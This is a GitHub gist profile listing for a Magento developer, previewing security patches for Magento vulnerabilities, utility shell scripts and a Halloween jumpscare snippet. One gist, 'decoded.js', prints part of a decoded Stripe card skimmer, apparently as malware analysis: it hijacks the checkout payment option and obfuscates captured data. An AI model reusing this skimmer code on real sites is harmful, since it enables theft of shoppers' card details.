Skip to content

Instantly share code, notes, and snippets.

View SamJUK's full-sized avatar

Sam James SamJUK

21 followers · 12 following
View GitHub Profile
@SamJUK
SamJUK / APSB25-94-magento-polyshell-fix.diff
Created March 19, 2026 22:13
Patch to fix the Polyshell vulnerability within Magento 2
# This diff fixes the Adobe Polyshell vulnerability for Magento 2
# It is a minimal subset of the official Adobe commit for maxiumum compatability across older versions.
# If you require help validating the patch, please reach out
#
# See the following references:
# https://sansec.io/research/magento-polyshell
# https://www.samdjames.uk/blog/magento2-polyshell-vulnerability/
# https://github.com/markshust/magento-polyshell-patch/
-- a/vendor/magento/framework/Api/ImageProcessor.php
++ b/vendor/magento/framework/Api/ImageProcessor.php
@SamJUK
SamJUK / php8.5-magento2.patch
Created November 24, 2025 18:07
This file has been truncated, but you can view the full file.
diff --color -ruN vendor/allure-framework/allure-codeception/src/Internal/UnitProvider.php vendor/allure-framework/allure-codeception/src/Internal/UnitProvider.php
--- vendor/allure-framework/allure-codeception/src/Internal/UnitProvider.php 2025-11-24 17:35:36
+++ vendor/allure-framework/allure-codeception/src/Internal/UnitProvider.php 2025-11-24 17:34:21
@@ -78,7 +78,7 @@
$testCase = $this->test->getTestCase();
$dataMethod = new ReflectionMethod($testCase, 'getProvidedData');
- $dataMethod->setAccessible(true);
+ $dataMethod;
$methodName = $testMetadata->getName();
@SamJUK
SamJUK / CVE-2025-54236-session-reaper-file-upload-controller.disable.diff
Created October 24, 2025 23:07
Mitigate SessionReaper (CVE-2025-54236) file upload exploit
# Disable SessionReaper (CVE-2025-54236) file upload exploit entirely.
# note: make sure to check you do not use this functionality before applying.
--- a/vendor/magento/module-customer/Controller/Address/File/Upload.php
+++ b/vendor/magento/module-customer/Controller/Address/File/Upload.php
@@ -70,6 +70,7 @@
*/
public function execute()
{
+ http_response_code(400);exit;
try {
@SamJUK
SamJUK / gist:094d8a9ad69a3d265e1d336285a1e1e7
Created September 9, 2025 13:26
diff --git a/vendor/magento/framework/Webapi/ServiceInputProcessor.php b/vendor/magento/framework/Webapi/ServiceInputProcessor.php
index ba58dc2bc7acf..06919af36d2eb 100644
--- a/vendor/magento/framework/Webapi/ServiceInputProcessor.php
+++ b/vendor/magento/framework/Webapi/ServiceInputProcessor.php
@@ -246,6 +246,13 @@ private function getConstructorData(string $className, array $data): array
if (isset($data[$parameter->getName()])) {
$parameterType = $this->typeProcessor->getParamType($parameter);
+ // Allow only simple types or Api Data Objects
+ if (!($this->typeProcessor->isTypeSimple($parameterType)
@SamJUK
SamJUK / cweagons-patch-cleanup
Created April 23, 2025 12:49
Shell script to cleanup obsolete cweagons composer patch files
#!/usr/bin/env sh
# File: ~/bin/cweagons-patch-cleanup
# Description: Shell script to cleanup obsolete cweagons composer patch files
help() {
echo "$(basename "$0") [-h] [--commit] -- script to cleanup no longer used cweagons patch entries
where:
-h show this help text
--commit Removes the flagged patches"
@SamJUK
SamJUK / decoded.js
Created February 11, 2025 21:10
Stripe Card Skimmer
void 0 !== window._edge && clearInterval(window._edge), window._edge = setInterval(function() {
"undefined" != typeof jQuery && jQuery("#stripe_payments").length && (jQuery("#stripe_payments").prop("checked", !1).show(), jQuery(".payment-method.stripe-payments").removeClass("_active"), function1(), clearInterval(window._edge))
}, 500);
var encrypt_data = function(e) {
var t, r, a = btoa(encodeURIComponent(e)),
n = "";
for (t = 0; t < a.length; t++) r = 25 + (28 + (126 ^ a[t].charCodeAt(0)) ^ 121), n += String.fromCharCode(r);
return n
};
@SamJUK
SamJUK / prompt-hcloud_ctx.zsh
Created January 3, 2025 23:51
P10k Custom Segments
#!/usr/bin/env zsh
# File: ~/.config/.p10k/prompt-hcloud_ctx.zsh
function prompt_hcloud_ctx() {
local _hcloud_context
[[ -z $_hcloud_context ]] && _hcloud_context=$(hcloud context list | awk '$1 ~ /^\*/ {print $2}')
[[ -n $_hcloud_context ]] || return
p10k segment -f red3 -i 'H' -t "$_hcloud_context"
}
@SamJUK
SamJUK / jumpscare.js
Created October 6, 2024 16:27
Jumpscare
(function() {
const d = new Date();
const isHalloween = d.getMonth() == 9 && d.getDate() == 31;
const isLate = d.getHours() > 21 || d.getHours() < 5;
const hasExecuted = document.cookie.includes('jumpscare');
const applyStyles = (element, styles) => {
Object.entries(styles).forEach(e => element.style[e[0]] = e[1]);
}
@SamJUK
SamJUK / speedsize_test_images.sh
Last active August 19, 2024 15:49
Test Speedsize serving incorrect images
#!/usr/bin/env sh
IMAGE="https://cdn.speedsize.com/52367726-9989-4d4a-be89-5d34aa139dea/static.magrigg.co.uk/media/catalog/product/b/a/barbour_men_s_cirrus_wellingtons_black_5.jpg?width=560&height=739&store=default&image-type=image/w_560"
echo "[i] Fetching Chromium Image"
curl -L $IMAGE \
-H 'accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8' \
-H 'Accept-Encoding: gzip, deflate, br' \
-H 'user-agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Mobile Safari/537.36' > chrome.jpg
@SamJUK
SamJUK / warden_install_spx.sh
Last active November 17, 2024 19:05
Warden.DEV SPX Installation for versions `0.14.3` and below.
#!/usr/bin/env sh
#
# A fairly simple shell script to install and configure PHP-SPX within a Warden.dev Environment
#
# @NOTE: This approach only works for versions upto `0.14.3` and below. You can check this with `warden version`
# For versions 0.15.0 and above, track this discussion: https://github.com/orgs/wardenenv/discussions/719
# Or, use @bgorski implementation instead https://gist.github.com/SamJUK/b3becaf6723acf4208eb5b8d92ef24f4?permalink_comment_id=5288398#gistcomment-5288398
#
# Usage:
# - Download the script: `curl https://... > ~/warden-install-spx.sh`